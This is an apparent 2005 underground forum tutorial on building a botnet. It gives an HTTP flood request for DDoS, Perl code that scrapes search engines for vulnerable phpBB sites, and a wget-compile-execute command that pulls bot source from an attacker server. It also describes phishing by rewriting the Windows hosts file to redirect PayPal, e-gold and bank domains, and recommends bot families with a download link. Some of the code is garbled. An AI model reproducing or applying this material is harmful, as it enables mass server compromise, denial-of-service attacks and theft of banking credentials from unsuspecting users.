Create your own botnet
DreAmeRz (ICQ: 817312)
Protection systems are constantly improving and programmers are becoming more experienced. Fewer and fewer widely known bugs are allowed now.
GET /server.org HTTP/1.0rnConnection: Keep-AlivernUser-Agent: Mozilla/4.75 [en] (X11; U; Windows 5.2 i686)rnHost: server.org:80rnAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*rnAccept-Encoding: gziprnAccept-Language: enrnAccept-Charset: iso-8859-1,*,utf-8rnrn
I.e. we just send request to server and make it respond. We send it until server will not get down because of lack of traffic or CPU time. But may be you just limit yourself with nix bots, you also need to create a Windows botnet, for example, based on AgoBot. In order to do so, you could create a botnet code that will scan for lsasl/dcom vulnerabilities on machines that connect to the server where the bot is installed. [Create a botnet] It is very easy to create a botnet. In order to do that, we will have to find a vulnerability in any of the web scripts. The found vulnerability will have to allow the execution of the shell interpreter commands. Once you have found the vulnerability, pay attention to the name of the buggy file, its header and the name of the vulnerable system. You should now use this information to build a good search query. For example, take all the well-known vulnerability in phpBB=2.0.10. The file name viewtopic.php, the variable specifying the value of the forum topic t. So the search query will be Powered by phpBB AND viewtopic.php?t=. The more reasonable and simple query you create, the more vulnerable servers you will catch. Every search server has slightly different query language, so read their description before you put together your query. Now you need to automate all this. To send a request to a search engine, we’ll write it like this in Perl:
$sock = IO::Socket::INET-new(PeerAddr=search.aol.com,PeerPort=80,Proto=tcp) or next; print $sock GET /aolcom/search?q=viewtopic.php?t=7Stage=0page=$n HTTP/1.0nn; resu = $sock; close($sock);
Next, filter the results and run the exploit. The exploit itself must execute our bot’s launch command.
wget http://_server.org/bot.c;gcc bot.c -o bash;chmod x bash;./bash;
Vulnerability in phpBB is valid before version 2.0.16, though developers claim to have fixed it in 2.0.11
Phishing It is very convenient to use bots as phishing tools. It requires a phishing page emulating a website and good web hosting, either a dedicated server or a VDS. Such pages can do yourself, buy, find on the network. The choice is enormous. Most phishing emails are sent to e-gold.com,paypal.com,citybank.com,usbank.com,ebay.com and other sites that are somehow related to e-commerce. Next, Windows bot rewrites file system32driversetchosts adding to its ip address of your server and assigning it to your desired site alias. The format of the file is as follows: 220.127.116.11 e-gold.com 18.104.22.168 paypal.com Ie by typing in a browser e-gold.com and paypal.com user gets to our server without suspecting anything. On the fisher’s server in httpd.conf records of corresponding domains are added. VirtualHost *:* DocumentRoot /home/e-gold.com/www ServerName www.e-gold.com ServerAlias e-gold.com www.e-gold.com /VirtualHost It is clear that in the browser line will be all the familiar address e-gold.com and even advanced user would log on to the site without suspicion. To complete the picture, I will say, that if user uses a proxy server, this method will not work
Bots for every taste Agobot/Phatbot/Forbot/XtremBot This is the best bot family. They are written in C and have many anti-detection features and over 500 modifications due to their explicit modular structure. SDBot/RBot/UrBot/UrXBot Current very popular bots for DDOS attacks. They come with a slew of advanced features. It features Sock4 open, keylogger, automated lsass and dcom vulnerability scanner. It also redirects requests to anti-virus sites to a local server by editing system32driversetchosts and setting up a small fake web server on port 80. DSNX Bots This bot can perform DDOS attacks, port scanning, and some other trivia. Q8 Bots An excellent bot for nix systems. It is characterized by its compact code (27KB, consists of one file) and good functionality. Can dynamically update itself by downloading and starting a new file. Good implementation of basic DDOS implementations (SYN-flood, UDP-flood). Good at executing system commands. Also good for system cloaking. kaiten Also good bot for Unix/Linux systems. Able to open remote shell on captured server. Perl-based bots These are very small bots, written in Perl. Used for DDOS attacks on Unix-based systems.
All mentioned here: http://_dreamerz.newmail.ru/bots.rar The article has a great bias towards hacking, so if you don’t understand, ask.
The rights to this article belong to the author. Reprinting, using parts of it, etc. for personal purposes on other resources is only permitted with the author’s verbal agreement.
Copyright (C) 2005 DreAmeRz specially for https://ver.sc
fullz dumps free